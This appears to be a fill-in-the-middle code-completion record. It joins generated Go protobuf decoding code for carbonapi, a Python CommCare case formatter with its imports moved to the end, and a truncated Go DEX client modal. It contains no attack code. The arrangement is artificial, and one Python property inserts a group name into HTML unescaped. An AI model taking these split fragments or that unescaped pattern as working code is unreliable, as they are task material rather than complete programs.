var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.PeerPort = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 7:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Host", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Host = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 8:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Referer", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Referer = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 9:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Format", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Format = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 10:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field UseCache", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.UseCache = bool(v != 0)
case 11:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Targets", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Targets = append(m.Targets, string(dAtA[iNdEx:postIndex]))
iNdEx = postIndex
case 12:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field CacheTimeout", wireType)
}
m.CacheTimeout = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.CacheTimeout |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 13:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Metrics", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Metrics = append(m.Metrics, string(dAtA[iNdEx:postIndex]))
iNdEx = postIndex
case 14:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field HaveNonFatalErrors", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.HaveNonFatalErrors = bool(v != 0)
case 15:
if wireType != 1 {
return fmt.Errorf("proto: wrong wireType = %d for field Runtime", wireType)
}
var v uint64
if (iNdEx + 8) > l {
return io.ErrUnexpectedEOF
}
iNdEx += 8
v = uint64(dAtA[iNdEx-8])
v |= uint64(dAtA[iNdEx-7]) << 8
v |= uint64(dAtA[iNdEx-6]) << 16
v |= uint64(dAtA[iNdEx-5]) << 24
v |= uint64(dAtA[iNdEx-4]) << 32
v |= uint64(dAtA[iNdEx-3]) << 40
v |= uint64(dAtA[iNdEx-2]) << 48
v |= uint64(dAtA[iNdEx-1]) << 56
m.Runtime = float64(math.Float64frombits(v))
case 16:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field HttpCode", wireType)
}
m.HttpCode = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.HttpCode |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 17:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field CarbonzipperResponseSizeBytes", wireType)
}
m.CarbonzipperResponseSizeBytes = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.CarbonzipperResponseSizeBytes |= (int64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 18:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field CarbonapiResponseSizeBytes", wireType)
}
m.CarbonapiResponseSizeBytes = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.CarbonapiResponseSizeBytes |= (int64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 19:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Reason", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Reason = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 20:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field SendGlobs", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.SendGlobs = bool(v != 0)
case 21:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field From", wireType)
}
m.From = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.From |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 22:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field Until", wireType)
}
m.Until = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.Until |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 23:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Tz", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Tz = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 24:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field FromRaw", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.FromRaw = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 25:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field UntilRaw", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.UntilRaw = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 26:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Uri", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Uri = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 27:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field FromCache", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.FromCache = bool(v != 0)
case 28:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field ZipperRequests", wireType)
}
m.ZipperRequests = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.ZipperRequests |= (int64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
default:
iNdEx = preIndex
skippy, err := skipCarbonapi(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthCarbonapi
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
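// skipCarbonapi returns the number of bytes consumed by the next field in
// dAtA, whatever its wire type, so callers can step over fields they do not
// recognize.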
func skipCarbonapi(dAtA []byte) (n int, err error) {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
wireType := int(wire & 0x7)
switch wireType {
case 0:
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
iNdEx++
if dAtA[iNdEx-1] < 0x80 {
break
}
}
return iNdEx, nil
case 1:
iNdEx += 8
return iNdEx, nil
case 2:
var length int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
length |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
iNdEx += length
if length < 0 {
return 0, ErrInvalidLengthCarbonapi
}
return iNdEx, nil
case 3:
for {
var innerWire uint64
var start int = iNdEx
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
innerWire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
innerWireType := int(innerWire & 0x7)
if innerWireType == 4 {
break
}
next, err := skipCarbonapi(dAtA[start:])
if err != nil {
return 0, err
}
iNdEx = start + next
}
return iNdEx, nil
case 4:
return iNdEx, nil
case 5:
iNdEx += 4
return iNdEx, nil
default:
return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
}
}
panic("unreachable")
}
var (
ErrInvalidLengthCarbonapi = fmt.Errorf("proto: negative length found during unmarshaling")
ErrIntOverflowCarbonapi = fmt.Errorf("proto: integer overflow")
)
func init() { proto.RegisterFile("carbonapi.proto", fileDescriptorCarbonapi) }
var fileDescriptorCarbonapi = []byte{
// 547 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x6c, 0x93, 0xcf, 0x6e, 0xd3, 0x40,
0x10, 0xc6, 0xe5, 0xa6, 0x75, 0x93, 0x6d, 0x9b, 0x96, 0xa5, 0x7f, 0xa6, 0x2d, 0x8d, 0x2c, 0x10,
0x22, 0x27, 0x24, 0xc4, 0x13, 0xb4, 0x05, 0x2a, 0x24, 0x84, 0x90, 0x81, 0xf3, 0x6a, 0x63, 0x4f,
0x92, 0x95, 0x1c, 0xaf, 0xd9, 0x5d, 0x53, 0x91, 0x27, 0xe4, 0xc8, 0x23, 0xa0, 0x9c, 0x79, 0x08,
0x34, 0xb3, 0x89, 0x41, 0x82, 0x9b, 0xbf, 0xdf, 0xcc, 0x7c, 0x3b, 0xbb, 0x33, 0x16, 0x87, 0x85,
0x76, 0x13, 0x5b, 0xeb, 0xc6, 0x3c, 0x6f, 0x9c, 0x0d, 0x56, 0xee, 0x75, 0xa0, 0x99, 0x3c, 0xfe,
0x95, 0x8a, 0xa3, 0xeb, 0xa2, 0x40, 0xef, 0xdf, 0xd9, 0xd9, 0x2b, 0x0c, 0xda, 0x54, 0x5e, 0x82,
0xd8, 0x9d, 0xeb, 0xba, 0xac, 0xd0, 0x41, 0x92, 0x25, 0xe3, 0x41, 0xbe, 0x91, 0xf2, 0xa9, 0x18,
0x76, 0xd5, 0xaa, 0x6d, 0x4d, 0x09, 0x5b, 0x9c, 0x70, 0xd0, 0xd1, 0xcf, 0xad, 0x29, 0xe5, 0x85,
0xe8, 0xb7, 0x1e, 0x5d, 0xad, 0x17, 0x08, 0x3d, 0x4e, 0xe8, 0xb4, 0x3c, 0x12, 0xbd, 0xd6, 0x55,
0xb0, 0xcd, 0x98, 0x3e, 0xe5, 0x99, 0xd8, 0x6d, 0x10, 0x9d, 0x32, 0x0d, 0xec, 0x30, 0x4d, 0x49,
0xbe, 0x6d, 0xe4, 0xa5, 0x18, 0x70, 0xa0, 0xb1, 0x2e, 0x40, 0x1a, 0x7d, 0x08, 0x7c, 0xb0, 0x2e,
0x48, 0x29, 0xb6, 0xe7, 0xd6, 0x07, 0xd8, 0x65, 0xce, 0xdf, 0xd4, 0xb8, 0xc3, 0x29, 0x3a, 0x74,
0xd0, 0x8f, 0x8d, 0xaf, 0xa5, 0x3c, 0x15, 0xe9, 0xd4, 0xba, 0x85, 0x0e, 0x30, 0x88, 0x47, 0x44,
0x45, 0x47, 0xb4, 0x1e, 0x55, 0xa1, 0x8b, 0x39, 0x82, 0xc8, 0x92, 0x71, 0x9f, 0x5b, 0xbd, 0x25,
0x4d, 0x76, 0x41, 0xbb, 0x19, 0x06, 0x0f, 0x7b, 0x59, 0x8f, 0xec, 0xd6, 0x52, 0x3e, 0x11, 0x07,
0x5c, 0xa2, 0x82, 0x59, 0xa0, 0x6d, 0x03, 0xec, 0x67, 0xc9, 0x78, 0x27, 0xdf, 0x67, 0xf8, 0x29,
0x32, 0x2a, 0x5f, 0x60, 0x70, 0xa6, 0xf0, 0x70, 0x10, 0xcb, 0xd7, 0x52, 0xbe, 0x10, 0x27, 0x73,
0xfd, 0x15, 0x55, 0x6d, 0x6b, 0x35, 0xd5, 0x41, 0x57, 0x0a, 0x9d, 0xb3, 0xce, 0xc3, 0x90, 0x3b,
0x90, 0x14, 0x7c, 0x6f, 0xeb, 0x37, 0x14, 0x7a, 0xcd, 0x11, 0xbe, 0x5a, 0x5b, 0xd3, 0x71, 0x70,
0x98, 0x25, 0xe3, 0x24, 0xdf, 0x48, 0xba, 0xc2, 0x3c, 0x84, 0x46, 0x15, 0xb6, 0x44, 0x38, 0xe2,
0x3e, 0xfa, 0x04, 0x6e, 0x6d, 0x89, 0xf2, 0x4e, 0x64, 0x71, 0x34, 0x4b, 0xd3, 0x34, 0xe8, 0x94,
0x43, 0xdf, 0xd8, 0xda, 0xa3, 0xf2, 0x66, 0x89, 0x6a, 0xf2, 0x2d, 0xa0, 0x87, 0x07, 0x59, 0x32,
0xee, 0xe5, 0x57, 0x7f, 0xe7, 0xe5, 0xeb, 0xb4, 0x8f, 0x66, 0x89, 0x37, 0x94, 0x24, 0xaf, 0xc5,
0xd5, 0x9f, 0xc9, 0xff, 0xcf, 0x45, 0xb2, 0xcb, 0x45, 0x97, 0xf4, 0xaf, 0xc5, 0xa9, 0x48, 0x1d,
0x6a, 0x6f, 0x6b, 0x78, 0x18, 0x67, 0x10, 0x95, 0xbc, 0x12, 0xc2, 0x63, 0x5d, 0xaa, 0x59, 0x65,
0x27, 0x1e, 0x8e, 0xf9, 0x09, 0x06, 0x44, 0xee, 0x08, 0xd0, 0xa0, 0xa7, 0xce, 0x2e, 0xe0, 0x84,
0xaf, 0xc6, 0xdf, 0xf2, 0x58, 0xec, 0xd0, 0xed, 0x2b, 0x38, 0x65, 0x18, 0x85, 0x1c, 0x8a, 0xad,
0xb0, 0x84, 0x33, 0x36, 0xdf, 0x0a, 0x4b, 0x79, 0x2e, 0xfa, 0x94, 0xad, 0x9c, 0xbe, 0x07, 0x88,
0xfb, 0x40, 0x3a, 0xd7, 0xf7, 0x3c, 0x77, 0xaa, 0xe1, 0xd8, 0xf9, 0x7a, 0x45, 0x09, 0x50, 0x90,
0x57, 0xd4, 0xc0, 0xc5, 0x66, 0x45, 0x0d, 0xb5, 0xc8, 0x4e, 0x71, 0x4f, 0x2e, 0x63, 0x8b, 0x44,
0xe2, 0xa2, 0x3c, 0x13, 0x87, 0xdd, 0xfb, 0x7e, 0x69, 0xd1, 0x07, 0x0f, 0x8f, 0xf8, 0x39, 0x86,
0x9b, 0xe7, 0x8c, 0xf4, 0x66, 0xff, 0xfb, 0x6a, 0x94, 0xfc, 0x58, 0x8d, 0x92, 0x9f, 0xab, 0x51,
0x32, 0x49, 0xf9, 0x87, 0x7c, 0xf9, 0x3b, 0x00, 0x00, 0xff, 0xff, 0xb6, 0xd6, 0xc1, 0xf2, 0xa3,
0x03, 0x00, 0x00,
}
| encodeFixed64Carbonapi |
cases.py | from django.urls import NoReverseMatch
from django.utils import html
from django.utils.translation import ugettext as _
from couchdbkit import ResourceNotFound
from casexml.apps.case.models import CommCareCaseAction
from corehq.apps.case_search.const import (
CASE_COMPUTED_METADATA,
SPECIAL_CASE_PROPERTIES,
SPECIAL_CASE_PROPERTIES_MAP,
)
from corehq.apps.es.case_search import flatten_result
from corehq.apps.groups.models import Group
from corehq.apps.locations.models import SQLLocation | from corehq.util.timezones.utils import parse_date
from corehq.util.view_utils import absolute_reverse
class CaseDataFormatter(BaseDataFormatter):
def __init__(self, request, domain, raw_data):
super(CaseDataFormatter, self).__init__(request, domain, raw_data)
self.raw_data = flatten_result(raw_data)
@property
def owner_id(self):
"""Special Case Property @owner_id"""
if 'owner_id' in self.raw_data:
return self.raw_data.get('owner_id')
elif 'user_id' in self.raw_data:
return self.raw_data.get('user_id')
else:
return ''
@property
def date_opened(self):
"""Special Case Property date_opened"""
return self._fmt_dateprop('opened_on', False)
@property
def last_modified(self):
"""Special Case Property last_modified"""
return self._fmt_dateprop('modified_on', False)
@property
def closed_by_username(self):
"""Computed metadata"""
return self._get_username(self.closed_by_user_id)
@property
def last_modified_by_user_username(self):
"""Computed metadata"""
return self._get_username(self.raw_data.get('user_id'))
@property
def opened_by_username(self):
"""Computed metadata"""
user = self._creating_user
if user is None:
return _("No Data")
return user['name'] or self._user_not_found_display(user['id'])
@property
def owner_name(self):
"""Computed metadata"""
owner_type, owner = self._owner
if owner_type == 'group':
return '<span class="label label-default">%s</span>' % owner['name']
return owner['name']
@property
def closed_by_user_id(self):
"""Computed metadata"""
return self.raw_data.get('closed_by')
@property
def opened_by_user_id(self):
"""Computed metadata"""
user = self._creating_user
if user is None:
return _("No data")
return user['id']
@property
def server_last_modified_date(self):
"""Computed metadata"""
return self._fmt_dateprop('server_modified_on', False)
def get_context(self):
context = {}
context.update(self.raw_data)
context.update(self._case_info_context)
context['_link'] = self._link
return context
@property
def _link(self):
try:
return absolute_reverse(
'case_data', args=[self.domain, self.raw_data.get('_id')]
)
except NoReverseMatch:
return None
@property
def _case_info_context(self):
context = {}
for prop in SPECIAL_CASE_PROPERTIES + CASE_COMPUTED_METADATA:
context[prop] = self._get_case_info_prop(prop)
return context
def _get_case_info_prop(self, prop):
fmt_prop = prop.replace('@', '')
if hasattr(self, fmt_prop):
return getattr(self, fmt_prop)
elif prop in SPECIAL_CASE_PROPERTIES:
return self._get_special_property(prop)
raise NotImplementedError(
"CaseDataFormatter.{} not found".format(prop))
def _get_special_property(self, prop):
return (SPECIAL_CASE_PROPERTIES_MAP[prop]
.value_getter(self.raw_data))
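# Format a date property through report_date_to_json; with iso=True the space
# separator is swapped for 'T' to yield an ISO 8601-style timestamp.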
def _fmt_dateprop(self, prop, iso=True):
val = report_date_to_json(
self.request,
self.domain,
parse_date(self.raw_data[prop])
)
if iso:
val = 'T'.join(val.split(' ')) if val else None
return val
@property
@quickcache(['self.owner_id'])
def _owning_group(self):
try:
return Group.get(self.owner_id)
except ResourceNotFound:
return None
@property
@quickcache(['self.owner_id'])
def _location(self):
return SQLLocation.objects.get_or_None(location_id=self.owner_id)
@property
@quickcache(['self.owner_id'])
def _owner(self):
if self._owning_group and self._owning_group.name:
return ('group', {'id': self._owning_group._id,
'name': self._owning_group.name})
elif self._location:
return ('location', {'id': self._location.location_id,
'name': self._location.display_name})
return ('user', self._user_meta(self.owner_id))
@property
def _creating_user(self):
try:
creator_id = self.raw_data['opened_by']
except KeyError:
creator_id = None
if 'actions' in self.raw_data:
for action in self.raw_data['actions']:
if action['action_type'] == 'create':
action_doc = CommCareCaseAction.wrap(action)
creator_id = action_doc.get_user_id()
break
if not creator_id:
return None
return self._user_meta(creator_id)
def _user_meta(self, user_id):
return {'id': user_id, 'name': self._get_username(user_id)}
def _user_not_found_display(self, user_id):
return _("Unknown [%s]") % user_id
@quickcache(['user_id'])
def _get_username(self, user_id):
if not user_id:
return None
try:
user = CouchUser.get_by_user_id(user_id)
if user:
return user.username
except CouchUser.AccountTypeError:
return None | from corehq.apps.reports.v2.models import BaseDataFormatter
from corehq.apps.reports.v2.utils import report_date_to_json
from corehq.apps.users.models import CouchUser
from corehq.util.quickcache import quickcache |
add_dex_modal.go | package dexclient
import (
"fmt"
"strconv"
"strings"
"decred.org/dcrdex/client/asset"
"decred.org/dcrdex/client/core"
"gioui.org/layout"
"gioui.org/widget"
"gioui.org/widget/material"
"github.com/planetdecred/dcrlibwallet"
"github.com/planetdecred/godcr/ui/decredmaterial"
"github.com/planetdecred/godcr/ui/load"
"github.com/planetdecred/godcr/ui/modal"
"github.com/planetdecred/godcr/ui/page/components"
"github.com/planetdecred/godcr/ui/values"
)
const testDexHost = "dex-test.ssgen.io:7232"
type addDexModal struct {
*load.Load
*decredmaterial.Modal
addDexServer decredmaterial.Button
dexServerAddress decredmaterial.Editor
isSending bool
cert decredmaterial.Editor
cancel decredmaterial.Button
materialLoader material.LoaderStyle
}
func newAddDexModal(l *load.Load) *addDexModal {
md := &addDexModal{
Load: l,
Modal: l.Theme.ModalFloatTitle("add_dex_modal"),
dexServerAddress: l.Theme.Editor(new(widget.Editor), "DEX Address"),
cert: l.Theme.Editor(new(widget.Editor), "Cert content"),
addDexServer: l.Theme.Button("Submit"),
cancel: l.Theme.OutlineButton("Cancel"),
materialLoader: material.Loader(l.Theme.Base),
}
md.dexServerAddress.Editor.SingleLine = true
if l.WL.MultiWallet.NetType() == dcrlibwallet.Testnet3 {
md.dexServerAddress.Editor.SetText(testDexHost)
}
return md
}
func (md *addDexModal) OnDismiss() {
md.dexServerAddress.Editor.SetText("")
}
func (md *addDexModal) OnResume() {
md.dexServerAddress.Editor.Focus()
}
func (md *addDexModal) Handle() {
if md.cancel.Button.Clicked() && !md.isSending {
md.Dismiss()
}
if md.addDexServer.Button.Clicked() {
if md.dexServerAddress.Editor.Text() == "" || md.isSending {
return
}
md.isSending = true
md.Modal.SetDisabled(true)
go func() {
cert := []byte(md.cert.Editor.Text())
dex, err := md.Dexc().DEXServerInfo(md.dexServerAddress.Editor.Text(), cert)
md.isSending = false
md.Modal.SetDisabled(false)
if err != nil {
md.Toast.NotifyError(err.Error())
return
}
// Ensure a wallet is connected that can be used to pay the fees.
// TODO: This automatically selects the dcr wallet if the DEX
// supports it for fee payment, otherwise picks a random wallet
// to use for fee payment. Should instead update the modal UI
// to show the options and let the user choose which wallet to
// set up and use for fee payment.
feeAssetName := "dcr"
feeAsset := dex.RegFees[feeAssetName]
if feeAsset == nil {
for feeAssetName, feeAsset = range dex.RegFees {
break
}
}
// Dismiss this modal before displaying a new one for adding a wallet
// or completing the registration.
md.Dismiss()
if md.Dexc().HasWallet(int32(feeAsset.ID)) {
md.completeRegistration(dex, feeAssetName, cert)
return
}
createWalletModal := newCreateWalletModal(md.Load,
&walletInfoWidget{
image: components.CoinImageBySymbol(md.Load, feeAssetName),
coinName: feeAssetName,
coinID: feeAsset.ID,
},
func() {
md.completeRegistration(dex, feeAssetName, cert)
})
md.ParentWindow().ShowModal(createWalletModal)
}()
}
}
func (md *addDexModal) Layout(gtx layout.Context) D {
w := []layout.Widget{
func(gtx C) D {
return md.Load.Theme.Label(values.TextSize20, "Add a dex").Layout(gtx)
},
func(gtx C) D {
return layout.Flex{Axis: layout.Vertical}.Layout(gtx,
layout.Rigid(func(gtx C) D {
return layout.Inset{Top: values.MarginPadding10}.Layout(gtx, func(gtx C) D {
return md.dexServerAddress.Layout(gtx)
})
}),
layout.Rigid(func(gtx C) D {
return layout.Inset{Top: values.MarginPadding15}.Layout(gtx, func(gtx C) D {
gtx.Constraints.Max.Y = 350
return md.cert.Layout(gtx)
})
}),
)
},
func(gtx C) D {
return layout.E.Layout(gtx, func(gtx C) D {
return layout.Flex{Axis: layout.Horizontal}.Layout(gtx,
layout.Rigid(func(gtx C) D {
if md.isSending {
return D{}
}
return layout.Inset{
Right: values.MarginPadding4,
Bottom: values.MarginPadding15,
}.Layout(gtx, md.cancel.Layout)
}),
layout.Rigid(func(gtx C) D {
if md.isSending {
return layout.Inset{
Top: values.MarginPadding10,
Bottom: values.MarginPadding15,
}.Layout(gtx, md.materialLoader.Layout)
}
return md.addDexServer.Layout(gtx)
}),
)
})
},
}
return md.Modal.Layout(gtx, w)
}
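// completeRegistration prompts for the app password and, once confirmed,
// submits the DEX registration, paying the fee from the selected wallet.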
func (md *addDexModal) completeRegistration(dex *core.Exchange, feeAssetName string, cert []byte) {
appPasswordModal := modal.NewPasswordModal(md.Load).
Title("Confirm Registration").
Hint("App password").
Description(confirmRegisterModalDesc(dex, feeAssetName)).
NegativeButton(values.String(values.StrCancel), func() {}).
PositiveButton("Register", func(password string, pm *modal.PasswordModal) bool {
go func() {
_, err := md.Dexc().RegisterWithDEXServer(dex.Host,
cert,
int64(dex.Fee.Amt),
int32(dex.Fee.ID),
[]byte(password))
